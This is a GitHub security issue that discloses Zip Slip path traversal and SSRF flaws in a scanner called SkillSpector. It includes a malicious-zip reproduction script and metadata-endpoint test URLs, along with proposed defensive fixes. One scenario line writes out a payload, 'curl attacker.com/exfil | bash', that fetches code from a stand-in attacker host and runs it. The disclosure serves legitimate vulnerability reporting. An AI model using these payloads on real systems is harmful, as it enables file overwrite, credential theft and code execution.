
[Security] Zip Slip path traversal and SSRF via permissive Git URL validation in InputHandler #147

Description

@mimran-khan

Summary

Imagine a post office that opens every parcel to inspect it for safety, but the inspection room has no blast containment — so a parcel designed to explode on opening detonates in the very facility meant to keep everyone safe. That's the paradox here: SkillSpector is a security scanner that is itself vulnerable to the attacks it should be detecting.

Two separate vulnerabilities exist in the InputHandler:

  1. Zip Slip (Path Traversal): When processing .zip skill archives, _extract_zip() calls zipfile.extractall() without validating that extracted paths stay within the target directory. A malicious zip can write files anywhere on the filesystem.

  2. SSRF (Server-Side Request Forgery): The _is_git_url() validation uses substring matching (if any(host in parsed.netloc for host in git_hosts)) and accepts any URL ending in .git. This allows an attacker to trick SkillSpector into making requests to internal network endpoints, cloud metadata services, or arbitrary hosts.

Relation to Existing Issues

This issue consolidates both vulnerabilities into one attack surface analysis of InputHandler, since they share the same root cause: the ingest layer processes attacker-controlled input without validation.

Why This Matters — Real-World Scenario

Scenario 1: Zip Slip in a CI/CD scanning pipeline

A company runs SkillSpector in their CI pipeline to vet community-submitted skills before publishing to an internal registry. The scanner runs as a GitHub Action on a shared runner.

A malicious contributor submits a skill as a .zip archive. Inside, the zip contains:

SKILL.md                                   (looks normal)
../../../home/runner/.bashrc               (payload: curl attacker.com/exfil | bash)

The CI pipeline downloads and scans the zip. SkillSpector's _extract_zip() unpacks it, writing to ../../../home/runner/.bashrc. The next time any job runs on that runner, the injected script exfiltrates secrets and source code.

Scenario 2: SSRF via Git URL on a cloud instance

The same pipeline accepts Git URLs for scanning. An attacker submits:

http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name.git

SkillSpector validates this URL: 169.254.169.254 is not in the default git_hosts list, but the URL ends in .git, and the fallback path accepts it. The scanner's host (an EC2 instance) issues a git clone to the metadata endpoint. Even though the clone fails, the HTTP request reaches the metadata service — and in some configurations, the error output or network logs expose IAM credentials.

In both cases, the security scanner itself becomes the attack vector.

Reproduction

Zip Slip

Build the malicious archive with Python:

import io
import zipfile

# Create malicious zip
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
    zf.writestr("SKILL.md", "---\nname: test\n---\n# Normal")
    zf.writestr("../../etc/pwned.txt", "you have been pwned")

# Save the archive to disk
with open("/tmp/evil-skill.zip", "wb") as f:
    f.write(buf.getvalue())

Then scan it from a shell:

skillspector scan /tmp/evil-skill.zip --no-llm
# Check if /tmp/etc/pwned.txt was created outside the temp extract dir
ls -la /tmp/etc/pwned.txt  # Should NOT exist, but it does
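
Because extraction behaviour can differ between Python versions, it may help to check what zipfile.extractall() does on the interpreter that runs the scanner before drawing conclusions. The following is a minimal sketch, not part of SkillSpector: probe_extractall is a hypothetical helper that extracts the same two entries into a directory nested inside a throwaway sandbox, so that a successful ../../ traversal would still land inside the sandbox, and then reports where each file ended up.

```python
import io
import tempfile
import zipfile
from pathlib import Path
from typing import Dict, List


def probe_extractall() -> Dict[str, List[str]]:
    """Extract a traversal-style archive in a sandbox and report file locations."""
    # Build the same archive as the reproduction, entirely in memory.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("SKILL.md", "# Normal")
        zf.writestr("../../etc/pwned.txt", "probe")
    buf.seek(0)

    report: Dict[str, List[str]] = {"inside": [], "escaped": []}
    with tempfile.TemporaryDirectory() as sandbox:
        sandbox_root = Path(sandbox).resolve()
        # Nest the target so that "../../" cannot leave the sandbox.
        extract_dir = sandbox_root / "a" / "b" / "extract"
        extract_dir.mkdir(parents=True)
        with zipfile.ZipFile(buf) as zf:
            zf.extractall(extract_dir)

        # Classify every extracted file by whether it stayed in extract_dir.
        for path in sorted(sandbox_root.rglob("*")):
            if not path.is_file():
                continue
            try:
                report["inside"].append(path.relative_to(extract_dir).as_posix())
            except ValueError:
                report["escaped"].append(path.relative_to(sandbox_root).as_posix())
    return report


if __name__ == "__main__":
    print(probe_extractall())
```

Any path listed under "escaped" indicates that the interpreter wrote outside the requested directory; an empty list means the traversal entry was neutralised for this particular archive, which still does not replace an explicit check in _extract_zip().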

SSRF

# Point to an internal HTTP service (simulated)
skillspector scan "http://169.254.169.254/latest/meta-data.git" --no-llm
# Observe: git clone attempt is made to the metadata endpoint
# Even on failure, the HTTP request reaches the target

Root Cause

Zip Slip — src/skillspector/input_handler.py lines 181-182:

def _extract_zip(self, zip_path: Path) -> Path:
    extract_dir = Path(tempfile.mkdtemp())
    with zipfile.ZipFile(zip_path, "r") as zf:
        zf.extractall(extract_dir)  # No path traversal check!
    return extract_dir

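_extract_zip() passes an attacker-controlled archive straight to zipfile.extractall() with no containment check of its own. The Python documentation warns against extracting archives from untrusted sources without prior inspection; the module attempts to sanitize member names (stripping leading slashes and .. components), so the exact outcome depends on the interpreter in use, but a security scanner should not rely on that alone. The fix is to validate that each entry's resolved path stays within extract_dir before extraction.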
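
One possible shape for that validation is sketched below. This is an illustration under assumptions rather than the project's actual patch: safe_extract_zip and UnsafeArchiveError are hypothetical names, and the sketch rejects the whole archive on the first suspicious entry instead of skipping it.

```python
import shutil
import tempfile
import zipfile
from pathlib import Path


class UnsafeArchiveError(ValueError):
    """Raised when an archive entry would land outside the extraction directory."""


def safe_extract_zip(zip_path: Path) -> Path:
    """Extract zip_path into a fresh temp dir after validating every entry."""
    # Resolve once so later comparisons are not confused by symlinked temp dirs.
    extract_dir = Path(tempfile.mkdtemp()).resolve()
    try:
        with zipfile.ZipFile(zip_path, "r") as zf:
            for info in zf.infolist():
                # Joining with an absolute name replaces extract_dir entirely,
                # so absolute entries fail the containment check as well.
                target = (extract_dir / info.filename).resolve()
                try:
                    target.relative_to(extract_dir)
                except ValueError:
                    raise UnsafeArchiveError(
                        f"entry escapes extraction dir: {info.filename!r}"
                    ) from None
            # Only extract once every entry has passed validation.
            zf.extractall(extract_dir)
    except Exception:
        # Do not leave a partially populated directory behind on failure.
        shutil.rmtree(extract_dir, ignore_errors=True)
        raise
    return extract_dir
```

Rejecting the archive outright, rather than silently dropping the offending entry, seems the safer default for a scanner: a traversal entry is itself a strong signal that the skill is malicious and is worth reporting as a finding.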

SSRF — src/skillspector/input_handler.py lines 105-117:

def _is_git_url(self, input_str: str) -> bool:
    git_hosts = ["github.com", "gitlab.com", "bitbucket.org"]
    parsed = urlparse(input_str)
    if parsed.scheme in ("http", "https", "git", "ssh"):
        if any(host in parsed.netloc for host in git_hosts):  # Substring match!
            return True
        if input_str.endswith(".git"):
            return True  # Any URL ending in .git is accepted
    return False

Two problems:

  1. Substring matching: "github.com" in "evil-github.com" is True — an attacker-controlled domain evil-github.com passes validation
  2. .git suffix fallback: Any URL ending in .git is accepted regardless of host, allowing internal network targets with a .git suffix
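
Both problems go away if the host is compared exactly against an allowlist and the .git fallback is removed. The sketch below assumes the same three hosts as the original git_hosts list; is_allowed_git_url and ALLOWED_GIT_HOSTS are hypothetical names, and narrowing the accepted schemes to https is an additional assumption that may be too strict for deployments relying on ssh remotes.

```python
from urllib.parse import urlparse

# Assumption: same hosts as the original git_hosts list, matched exactly.
ALLOWED_GIT_HOSTS = frozenset({"github.com", "gitlab.com", "bitbucket.org"})


def is_allowed_git_url(input_str: str) -> bool:
    """Return True only for https URLs whose host is exactly on the allowlist."""
    try:
        parsed = urlparse(input_str)
        # .hostname strips userinfo and port and lowercases the host.
        hostname = parsed.hostname
    except ValueError:
        # Malformed authority sections (e.g. broken IPv6 literals) are rejected.
        return False
    if parsed.scheme != "https" or hostname is None:
        return False
    # Exact membership test: no substring matching, no ".git" suffix fallback.
    return hostname.rstrip(".") in ALLOWED_GIT_HOSTS
```

Using parsed.hostname rather than parsed.netloc also avoids being fooled by userinfo tricks such as https://github.com@evil.example/x.git, where the real host is evil.example.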

The _clone_git() method (lines 125-148) then runs git clone without any hardening: there is no --depth 1 to bound how much history is fetched, and neither GIT_TERMINAL_PROMPT=0 nor GIT_ASKPASS=/bin/true is set to stop Git from prompting for, and potentially leaking, credentials.
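
A hardened clone invocation could look roughly like the following sketch. The helper names (build_clone_command, build_clone_env, clone_repo) and the 60-second timeout are assumptions for illustration; the -- separator is an extra precaution, not something the original code is known to use, that keeps a URL beginning with a dash from being parsed as an option.

```python
import os
import subprocess
from pathlib import Path
from typing import Dict, List


def build_clone_command(url: str, dest: Path) -> List[str]:
    """Build a shallow clone command; '--' ends option parsing before the URL."""
    return ["git", "clone", "--depth", "1", "--", url, str(dest)]


def build_clone_env() -> Dict[str, str]:
    """Copy the current environment and disable Git's credential prompts."""
    env = dict(os.environ)
    env["GIT_TERMINAL_PROMPT"] = "0"   # never prompt on the terminal
    env["GIT_ASKPASS"] = "/bin/true"   # helper that supplies no credentials
    return env


def clone_repo(url: str, dest: Path, timeout: float = 60.0) -> None:
    """Run the clone without a shell; raises on failure or timeout."""
    subprocess.run(
        build_clone_command(url, dest),
        env=build_clone_env(),
        check=True,
        timeout=timeout,
        capture_output=True,
    )
```

Passing the arguments as a list, with no shell involved, means the URL is never interpreted by a shell. The URL should still pass host validation before clone_repo is called.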

Impact

  • Zip Slip: Arbitrary file write on the host filesystem — can overwrite configuration files, inject backdoors into CI runners, or corrupt system files
  • SSRF: Network requests to internal services, cloud metadata endpoints (169.254.169.254), or arbitrary external hosts from the scanner's network position
  • Privilege escalation path: Zip Slip + CI runner = code execution as the CI service account
  • Supply chain risk: A scanner vulnerability means the security gate itself is compromised — all skills passing through it are at risk
  • Trust violation: Security tools are granted elevated access precisely because they're trusted; a vulnerability here has outsized blast radius
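
As a defense-in-depth measure against the SSRF impact above, the scanner could also refuse any target that resolves to an internal address, regardless of how the URL was validated. The following sketch uses Python's standard ipaddress and socket modules; is_internal_address and host_resolves_to_internal are hypothetical helper names, and failing closed on resolution errors is a design assumption.

```python
import ipaddress
import socket


def is_internal_address(address: str) -> bool:
    """Return True for loopback, private, link-local and similar addresses."""
    # Drop an IPv6 zone identifier such as "%eth0" before parsing.
    ip = ipaddress.ip_address(address.split("%", 1)[0])
    # Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so the IPv4 rules apply.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return (
        ip.is_private
        or ip.is_loopback
        or ip.is_link_local      # covers 169.254.169.254
        or ip.is_multicast
        or ip.is_reserved
        or ip.is_unspecified
    )


def host_resolves_to_internal(hostname: str, port: int = 443) -> bool:
    """Return True if any resolved address is internal, or if resolution fails."""
    try:
        infos = socket.getaddrinfo(hostname, port, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return True  # fail closed: an unresolvable host is not cloned
    return any(is_internal_address(info[4][0]) for info in infos)
```

This check and the later git clone resolve the name separately, so it does not by itself rule out DNS rebinding; it is best treated as a complement to a strict host allowlist and network-level egress controls, not a replacement for them.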

Affected Version

SkillSpector v2.2.3
